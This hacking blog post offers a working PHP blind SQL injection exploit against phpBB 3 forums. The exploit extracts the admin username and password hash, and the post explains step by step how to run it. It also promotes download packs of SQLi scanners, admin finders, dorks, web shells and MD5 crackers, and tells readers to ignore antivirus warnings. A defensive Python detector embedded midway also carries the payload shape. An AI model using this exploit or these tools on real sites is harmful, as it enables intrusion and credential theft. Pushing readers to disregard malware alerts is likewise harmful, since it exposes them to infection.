how to hack phpbb 3 board (forum)

PHPBB3 Exploit !!

EDIT: DOWNLOAD THE LATEST PACK CONTAINING ALL THE TOOLS FOR THIS HACKING PROCESS : http://adf.ly/BimX

1. Download and install the latest version of PHP (google it).
2. Copy and paste the whole long code below into a .txt document, i.e. in Notepad, and save it as whatever you want to call it.
3. Right-click the .txt document and change the extension from .txt to .php.
4. Go to Start - Run - type cmd - hit Enter.
5. Type: cd (the location where you installed PHP, e.g. cd C:\programfiles\php) and hit Enter.
6. Now that you are in the location where you installed PHP (in the cmd box), type "php", then the name of whatever you named the exploit, and hit Enter.
7. You're done; it's self-explanatory from there .... I think.

I think those instructions will work, or something like that. I've always been **** at using PHP exploits, much preferred Perl/Python/Ruby ones, but w/e.


PHP Code:
#!/usr/bin/php -q -d short_open_tag=on
rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/

if ($argc<5) result="'';$exa=" cont="0;" i="0;"> 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
$discl=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++) {
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie)) {
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++) {
if (in_array($i,$md5s)) {
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++) {
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
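A defender-side counterpart to the script above, added here as an example that is not part of the original post or of rgod's exploit. The injection travels through the member search's `ip` field, so the two natural controls are to validate that field against the address syntax a legitimate search actually needs, and to notice the burst of malformed searches that character-by-character extraction produces (one request per candidate byte, with the script above sleeping two seconds between them). Everything in the sample is constructed: the request records and their tuple layout, the `sid=...` session cookies, the `/forum/` path, and the assumption that dotted quads with `*` wildcards are the only address syntax a legitimate search needs.

```python
"""Detector for blind SQL injection probing of a member-search ``ip`` filter.

Added example, not part of the original post or of the exploit above. The
request records, session ids and log layout are constructed; the wildcard
grammar is an assumption about what a legitimate address search needs.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# A legitimate address filter: four dot-separated fields, each an octet
# 0-255 or a '*' wildcard (assumption: wildcards are the only extra syntax).
_OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d|\*)"
IP_FILTER_RE = re.compile(rf"^{_OCTET}(?:\.{_OCTET}){{3}}$")

# SQL tokens that never belong in an address filter: a cheap second signal
# that upgrades "malformed" to "sqli" for alert priority.
SQL_TOKEN_RE = re.compile(r"\b(?:UNION|SELECT|SUBSTRING|ASCII|IF)\b", re.I)


def extract_ip_param(query_string, body):
    """Return the ``ip`` value, preferring the POST body over the query string."""
    for raw in (body, query_string):
        values = parse_qs(raw, keep_blank_values=True).get("ip")
        if values:
            return values[0]
    return None


def classify_ip_value(value):
    """Map one ``ip`` value to 'absent', 'ok', 'sqli' or 'malformed'."""
    if not value:                      # no filter submitted at all
        return "absent"
    if IP_FILTER_RE.match(value):
        return "ok"
    if SQL_TOKEN_RE.search(value):
        return "sqli"
    return "malformed"


def classify_request(request_line, body):
    """Classify one HTTP request; None when it is not a member search."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return None
    url = urlsplit(parts[1])
    if not url.path.endswith("/memberlist.php"):
        return None
    return classify_ip_value(extract_ip_param(url.query, body))


def find_probing_sessions(requests, threshold=5, window=60):
    """Sessions sending >= threshold bad ``ip`` filters inside ``window`` seconds.

    Character-by-character extraction needs one request per candidate byte,
    so the probes cluster tightly even when the client sleeps between them.
    Returns {session: peak count of bad filters seen in any window}.
    """
    bad_times = defaultdict(list)
    for ts, session, request_line, body in requests:
        if classify_request(request_line, body) in ("sqli", "malformed"):
            bad_times[session].append(ts)
    flagged = {}
    for session, times in bad_times.items():
        times.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:     # slide the window start forward
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            flagged[session] = peak
    return flagged


# Constructed sample traffic: (epoch seconds, session cookie, request line, body).
# The probe body mirrors the shape of the payload in the script above, with
# the compared byte value stepping through candidates for one hash position.
_PROBE_LINE = "POST /forum/memberlist.php?mode=searchuser&ip=%5C%27 HTTP/1.0"
_PROBE_BODY = ("username=&ip=1.1.1.999%27%29+UNION+SELECT+IF%28ASCII%28SUBSTRING"
               "%28USER_PASSWORD%2C1%2C1%29%29%3D{byte}%2C2%2C-1%29+FROM+PHPBB_USERS"
               "&submit=Search")
SAMPLE_REQUESTS = [
    (1000 + 2 * k, "sid=deadbeef", _PROBE_LINE, _PROBE_BODY.format(byte=48 + k))
    for k in range(6)
] + [
    (1001, "sid=cafe", "POST /forum/memberlist.php?mode=searchuser HTTP/1.0",
     "username=alice&ip=10.0.*.*&submit=Search"),       # legitimate wildcard search
    (1003, "sid=cafe", "GET /forum/viewtopic.php?t=1 HTTP/1.0", ""),
    (1005, "sid=f00d", "POST /forum/memberlist.php?mode=searchuser HTTP/1.0",
     "username=bob&ip=&submit=Search"),                 # search without an ip filter
]

if __name__ == "__main__":
    for ts, session, line, body in SAMPLE_REQUESTS:
        print(ts, session, classify_request(line, body))
    print("probing sessions:", find_probing_sessions(SAMPLE_REQUESTS))
```

The strict grammar in `IP_FILTER_RE` is the mitigation half: an address filter that is checked against it before it ever reaches a query has nowhere to put a closing quote or a `UNION`, and the same check is the reason the detector can treat any non-matching value as suspicious rather than hunting for specific keywords. The session-burst half exists because a single malformed search is ordinary user error; dozens from one session inside a minute is the signature of a boolean oracle being walked one byte at a time.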



***********************************************************************************
NEWS BUZZ:

Hello everybody,

Since I started learning SQLi, I have collected lots of good tools and documents, and I'm still collecting more and more day by day as my scope of knowledge is increasing.
So I thought of sharing what I have collected till now with everyone here.
My tool pack includes the following things.

DOWNLOADS :

SQLI SCANNER PACK : http://adf.ly/6tth
MD5 tools pack : http://adf.ly/6tuV
ADMIN FINDR : http://adf.ly/6tuk
SQLI TUTORIAL PACK : http://adf.ly/6tuw
DORKS PACK : http://adf.ly/6tv7
SHELLS PACK : http://adf.ly/6tvD

DON'T DOWNLOAD IF YOU DON'T KNOW WHAT A FALSE POSITIVE VIRUS ALERT IS

1) SQLi scanner/automating injection pack:
contains 5 pieces of software for scanning and automating the hacking process

(a) Exploit scanner - for finding websites with dorks, and testing them for vulnerabilities. Very famous.
(b) Turkish ARTA - same as Exploit scanner but not as famous because it's Turkish. I find it better than Exploit scanner, but that's my personal opinion.
(c) Havij 1.12 free version: I guess everyone knows about it. It automates the process of performing an SQLi attack on any site.
It is extremely famous and efficient, but it's still a tool :) nothing compared to the manual process.
(d) SQLi Helper 2.7: same as Havij, but a little faster.
(e) sqlinj Version 2 - another nice SQL injection tool. I will write a tutorial later on how to use this tool.

2) Admin Finder pack:
After getting the logins from the database, one needs to find the admin login page. For some sites it's very easy, while for some sites it's hellova tough.
Here are some nice admin finder tools and lists that you may use, but these tools are never enough. I will keep uploading the admin finder lists as I get more.

(a) reiluke admin finder (you can update the original admin finder lists with the list I am providing)
(b) 5 Perl and Python admin finder tools/scripts. Update them as per your need.
(c) Misc software: admin pass locator, to brute force the admin pass if you can't find it.

YOU MIGHT ALSO LIKE THIS SITE
http://th3-0utl4ws.com/tools/admin-finder/

3) Dorks pack: contains many files containing more than 7000 dorks.

4) Shells: this pack contains many shells and source codes, like c99, c100, jackel and hellova more.
(Many shells like c99 are identified as trojans by many antivirus programs, so you might find your antivirus shouting about this pack.)
You might also wanna see this site:
http://www.kinginfet.net/shells/

5) MD5 cracking tools: although Havij has an MD5 tool, for some reason it never worked for me, so this pack contains some tools.
ALSO, THESE SITES WILL PROVE A GREAT HELP TO YOU
http://www.md5decrypter.com/
http://www.md5decrypter.co.uk/
http://md5.rednoize.com/
http://md5decryption.com/
http://passcracking.com/
http://www.xmd5.org/
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org

6) SQLi tutorials pack: This pack contains complete HTML pages of SQLi tutorials that I found useful from various forums and websites like hackforum, elitesoft, warex, outlaws etc. I bet every newbie will love this pack.
You just need a Firefox browser to open these HTML files.
NOTE: this pack also contains 2 of my own SQLi help files which I created myself; they serve me as a very useful document whenever I'm on to hack some site.

I will keep updating these packs as I learn and collect more and more.

1 comment:

Anonymous said...

Just popping in to say nice site.